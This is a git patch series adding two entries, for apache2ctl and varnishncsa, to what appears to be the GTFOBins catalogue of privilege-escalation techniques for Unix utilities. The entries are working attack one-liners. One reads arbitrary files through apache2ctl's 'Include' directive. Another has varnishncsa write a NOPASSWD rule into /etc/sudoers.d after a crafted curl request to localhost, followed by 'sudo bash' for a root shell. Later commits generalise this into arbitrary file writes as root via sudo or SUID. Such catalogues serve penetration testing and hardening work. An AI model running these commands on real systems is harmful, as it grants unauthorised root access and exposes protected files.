From 2c9f0de8e5e23380671f6b46bcc5350dac81c464 Mon Sep 17 00:00:00 2001 From: nuts7 Date: Mon, 19 Jun 2023 10:59:59 +0200 Subject: [PATCH 1/5] Add varnishncsa & apache2ctl This commit adds 2 files (_gtfobins/apache2ctl.md and _gtfobins/varnishncsa.md) containing privilege escalation methods for the varnishncsa and apache2ctl utilities. --- _gtfobins/apache2ctl.md | 16 ++++++++++++++++ _gtfobins/varnishncsa.md | 8 ++++++++ 2 files changed, 24 insertions(+) create mode 100644 _gtfobins/apache2ctl.md create mode 100644 _gtfobins/varnishncsa.md diff --git a/_gtfobins/apache2ctl.md b/_gtfobins/apache2ctl.md new file mode 100644 index 00000000..14237106 --- /dev/null +++ b/_gtfobins/apache2ctl.md @@ -0,0 +1,16 @@ +--- +description: apache2ctl is a front end to the Apache HyperText Transfer Protocol (HTTP) server. It is designed to help the administrator control the functioning of the Apache apache2 daemon. +functions: + file-read: + - code: cp -r /etc/apache2/ /tmp/apache2 + - code: | + LFILE=file_to_read + echo "Include $LFILE" >> /tmp/apache2/apache2.conf + - code: apache2ctl -d /tmp/apache2 -k restart + sudo: + - code: cp -r /etc/apache2/ /tmp/apache2 + - code: | + LFILE=file_to_read + echo "Include $LFILE" >> /tmp/apache2/apache2.conf + - code: sudo apache2ctl -d /tmp/apache2 -k restart +--- diff --git a/_gtfobins/varnishncsa.md b/_gtfobins/varnishncsa.md new file mode 100644 index 00000000..65cbbc84 --- /dev/null +++ b/_gtfobins/varnishncsa.md @@ -0,0 +1,8 @@ +--- +description: varnishncsa utility reads varnishd shared memory Varnish logs and presents them in the Apache / NCSA "combined" log format. +functions: + sudo: + - code: sudo varnishncsa -g request -q "ReqURL ~ \"/exploit_randomfoo\"" -F '%{exploit}i' -w /etc/sudoers.d/user & + - code: curl -H 'exploit: user ALL = (ALL) NOPASSWD: ALL' localhost:6081/exploit_randomfoo + - code: sudo bash +--- \ No newline at end of file From 0190295ed22c7862dae77d719d38af084dd10361 Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Sat, 23 Dec 2023 12:13:45 +0100 Subject: [PATCH 2/5] Simplify apache2ctl --- _gtfobins/apache2ctl.md | 22 +++++++++------------- 1 file changed, 9 insertions(+), 13 deletions(-) diff --git a/_gtfobins/apache2ctl.md b/_gtfobins/apache2ctl.md index 14237106..20280e03 100644 --- a/_gtfobins/apache2ctl.md +++ b/_gtfobins/apache2ctl.md @@ -1,16 +1,12 @@ --- -description: apache2ctl is a front end to the Apache HyperText Transfer Protocol (HTTP) server. It is designed to help the administrator control the functioning of the Apache apache2 daemon. +description: This includes the file in the actual configuration file, the first line is leaked as an error message. functions: - file-read: - - code: cp -r /etc/apache2/ /tmp/apache2 - - code: | - LFILE=file_to_read - echo "Include $LFILE" >> /tmp/apache2/apache2.conf - - code: apache2ctl -d /tmp/apache2 -k restart - sudo: - - code: cp -r /etc/apache2/ /tmp/apache2 - - code: | - LFILE=file_to_read - echo "Include $LFILE" >> /tmp/apache2/apache2.conf - - code: sudo apache2ctl -d /tmp/apache2 -k restart + file-read: + - code: | + LFILE=file_to_read + apache2ctl -c "Include $LFILE" -k stop + sudo: + - code: | + LFILE=file_to_read + sudo apache2ctl -c "Include $LFILE" -k stop --- From efaf1b11e88c7ff27013b1dbeb93e8977045f2e5 Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Sat, 23 Dec 2023 12:40:09 +0100 Subject: [PATCH 3/5] Polish varnishncsa --- _gtfobins/varnishncsa.md | 22 ++++++++++++++++------ 1 file changed, 16 insertions(+), 6 deletions(-) diff --git a/_gtfobins/varnishncsa.md b/_gtfobins/varnishncsa.md index 65cbbc84..b86cc11e 100644 --- a/_gtfobins/varnishncsa.md +++ b/_gtfobins/varnishncsa.md @@ -1,8 +1,18 @@ --- -description: varnishncsa utility reads varnishd shared memory Varnish logs and presents them in the Apache / NCSA "combined" log format. +description: | + This allows to write arbitrary files as root, provided that the proper HTTP response is made. Specifically the content of a certain header will be written in the file. First start `varnishncsa` as follows, then trigger the file write with: + + ``` + curl -H 'yyy: DATA' http://localhost:6081/xxx + ``` +description: functions: - sudo: - - code: sudo varnishncsa -g request -q "ReqURL ~ \"/exploit_randomfoo\"" -F '%{exploit}i' -w /etc/sudoers.d/user & - - code: curl -H 'exploit: user ALL = (ALL) NOPASSWD: ALL' localhost:6081/exploit_randomfoo - - code: sudo bash ---- \ No newline at end of file + sudo: + code: | + LFILE=file_to_write + sudo varnishncsa -g request -q 'ReqURL ~ "/xxx"' -F '%{yyy}i' -w "$LFILE" + suid: + code: | + LFILE=file_to_write + ./varnishncsa -g request -q 'ReqURL ~ "/xxx"' -F '%{yyy}i' -w "$LFILE" +--- From d71410748f870a1101441ca8664060cbc328904e Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Sat, 23 Dec 2023 12:42:22 +0100 Subject: [PATCH 4/5] Fix broken YAML in varnishncsa --- _gtfobins/varnishncsa.md | 1 - 1 file changed, 1 deletion(-) diff --git a/_gtfobins/varnishncsa.md b/_gtfobins/varnishncsa.md index b86cc11e..e18f122b 100644 --- a/_gtfobins/varnishncsa.md +++ b/_gtfobins/varnishncsa.md @@ -5,7 +5,6 @@ description: | ``` curl -H 'yyy: DATA' http://localhost:6081/xxx ``` -description: functions: sudo: code: | From 914c850cec893cfb78e71b509bf636954d7febd7 Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Sat, 23 Dec 2023 12:43:57 +0100 Subject: [PATCH 5/5] Fix broken YAML in varnishncsa --- _gtfobins/varnishncsa.md | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/_gtfobins/varnishncsa.md b/_gtfobins/varnishncsa.md index e18f122b..1f803ddc 100644 --- a/_gtfobins/varnishncsa.md +++ b/_gtfobins/varnishncsa.md @@ -7,11 +7,11 @@ description: | ``` functions: sudo: - code: | - LFILE=file_to_write - sudo varnishncsa -g request -q 'ReqURL ~ "/xxx"' -F '%{yyy}i' -w "$LFILE" + - code: | + LFILE=file_to_write + sudo varnishncsa -g request -q 'ReqURL ~ "/xxx"' -F '%{yyy}i' -w "$LFILE" suid: - code: | - LFILE=file_to_write - ./varnishncsa -g request -q 'ReqURL ~ "/xxx"' -F '%{yyy}i' -w "$LFILE" + - code: | + LFILE=file_to_write + ./varnishncsa -g request -q 'ReqURL ~ "/xxx"' -F '%{yyy}i' -w "$LFILE" ---